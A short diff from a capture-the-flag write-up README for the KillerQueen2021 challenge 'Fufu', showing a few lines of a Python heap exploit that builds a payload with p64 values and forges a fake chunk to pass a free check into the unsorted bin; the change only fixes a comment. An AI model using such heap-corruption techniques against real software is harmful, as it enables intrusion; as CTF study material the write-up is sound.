Aleks-dotcom/writeups/KillerQueen2021/Fufu/README.md

 payload += p64(0x61)
 payload += p64(0)
 payload += p64(0)
-create(0,0x70,payload) <------- chunk C inside this one we create a fake chunk to pass the chek for freeing into unsorted bin
+create(0,0x70,payload) <------- chunk C. Inside this one we create a fake chunk to pass the chek for freeing into unsorted bin

 reset(0)